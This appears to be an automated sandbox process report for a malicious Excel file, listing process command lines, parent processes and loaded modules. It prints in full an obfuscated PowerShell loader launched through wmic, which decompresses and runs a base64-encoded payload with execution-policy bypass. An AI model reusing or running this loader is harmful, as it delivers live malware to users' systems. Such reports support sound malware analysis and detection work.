Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll

PID
5724
CMD
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\ab1q55zd.cmdline"
Path
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Indicators
No indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Visual C# Command Line Compiler
Version
4.7.2556.0 built by: NET471REL1
Modules
Image
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\combase.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\version.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\microsoft.net\framework64\v4.0.30319\alink.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscorpehost.dll

PID
4200
CMD
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESBA2B.tmp" "c:\Users\admin\AppData\Local\Temp\CSC1C0F2C3A60AA4450AD6729B2777C95DE.TMP"
Path
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Indicators
No indicators
Parent process
csc.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft® Resource File To COFF Object Conversion Utility
Version
12.00.52519.0 built by: VSWINSERVICING
Modules
Image
c:\windows\microsoft.net\framework64\v4.0.30319\cvtres.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\bcryptprimitives.dll

PID
2736
CMD
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\admin\Desktop\MIL0001537426.xls"
Path
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
16.0.11328.20158
Modules
Image
c:\program files\microsoft office\root\office16\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ole32.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcryptprimitives.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\program files\common files\microsoft shared\clicktorun\c2r64.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\imm32.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso20win32client.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso30win32client.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso40uiwin32client.dll
c:\windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.16299.431_none_46b2c6d3edf81841\gdiplus.dll
c:\windows\system32\dwmapi.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso50win32client.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso98win32client.dll
c:\windows\system32\wtsapi32.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso.dll
c:\windows\system32\version.dll
c:\windows\system32\msi.dll
c:\windows\system32\bcrypt.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.431_none_15c7d3ee93659e73\comctl32.dll
c:\windows\system32\d2d1.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\msctf.dll
c:\windows\system32\winsta.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\resourcepolicyclient.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\d3d10warp.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\dwrite.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\riched20.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\netprofm.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\npmproxy.dll
c:\windows\system32\windows.system.profile.retailinfo.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\sppc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\program files\microsoft office\root\office16\oart.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\twinapi.appcore.dll
c:\windows\system32\rmclient.dll
c:\windows\system32\twinapi.dll
c:\windows\system32\textinputframework.dll
c:\windows\system32\coreuicomponents.dll
c:\windows\system32\coremessaging.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wintypes.dll
c:\windows\system32\cabinet.dll
c:\program files\microsoft office\root\office16\msohev.dll
c:\windows\system32\cldapi.dll
c:\windows\system32\fltlib.dll
c:\windows\system32\aepic.dll
c:\windows\system32\propsys.dll
c:\windows\system32\mpr.dll
c:\windows\system32\windows.staterepositoryps.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msiso.dll
c:\windows\system32\coml2.dll
c:\windows\system32\explorerframe.dll
c:\program files\microsoft office\root\office16\gkexcel.dll
c:\windows\system32\mlang.dll
c:\program files\microsoft office\root\office16\gfx.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\slc.dll
c:\windows\system32\srpapi.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll
c:\windows\system32\uiautomationcore.dll
c:\program files\microsoft office\root\vfs\system\msvcr100.dll
c:\windows\system32\sxs.dll
c:\windows\system32\dataexchange.dll
c:\windows\system32\dcomp.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll
c:\windows\system32\wintrust.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\1033\vbe7intl.dll
c:\windows\system32\directmanipulation.dll
c:\windows\system32\d3d10_1.dll
c:\windows\system32\d3d10_1core.dll
c:\windows\system32\usp10.dll
c:\windows\system32\windows.globalization.dll
c:\windows\system32\bcp47langs.dll
c:\windows\system32\globinputhost.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\msptls.dll
c:\windows\system32\windowscodecs.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeuires.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\1033\vbeuiintl.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\cscapi.dll
c:\program files\microsoft office\root\vfs\system\fm20.dll
c:\program files\microsoft office\root\vfs\system\fm20enu.dll
c:\program files\microsoft office\root\vfs\system\mscomctl.ocx
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.16299.431_none_887985224abb0026\comctl32.dll
c:\program files\microsoft office\root\office16\msoarianext.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\windows.networking.connectivity.dll
c:\windows\system32\wininet.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\windows.security.authentication.onlineid.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dpapi.dll
c:\windows\system32\onecoreuapcommonproxystub.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\schannel.dll
c:\windows\system32\mskeyprotect.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\ntasn1.dll
c:\windows\system32\ncryptsslp.dll

PID
5800
CMD
wMIc 'pRoCEss' 'CALL' "cREate" "POWeRsHEll -NOprOf -WiN 00000000000000000000001 -EP byPass -nONiNtErac $K03 = [STRing][CHAr]34 ;$7HE =([CHAr]44).TOSTRinG() ;"\".(${K03}{0}{1}${K03} -f's'${7HE}'al') ('Re') (${K03}{0}{2}{1}${K03}-f'N'${7HE}'-Object'${7HE}'ew');.(${K03}{0}{1}${K03}-f 's'${7HE}'al') ('Er') (${K03}{1}{0}${K03}-f 'x'${7HE}'iE');Er(Re io.COMpResSion.DEFLATEsTREAM([sYSTEm.io.mEmORyStrEAM] [COnVeRt]::frOmBaSe64StrIng( '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' ) ${7HE} [iO.COmpREsSiON.compRESSiOnMode]::decOmprEsS)|% {Re io.STreAMrEADeR( `$_ ${7HE} [texT.ENcodInG]::utf8 ) } ).rEADtoeNd( )"\" |ieX"
Path
C:\WINDOWS\System32\Wbem\wMIc.exe
Indicators
No indicators
Parent process
EXCEL.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\sechost.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\shcore.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\imm32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msiso.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\dwmapi.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\msoxmlmf.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll

PID
5840
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
Parent process
wMIc.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\msctf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\dwmapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.431_none_15c7d3ee93659e73\comctl32.dll

PID
2504
CMD
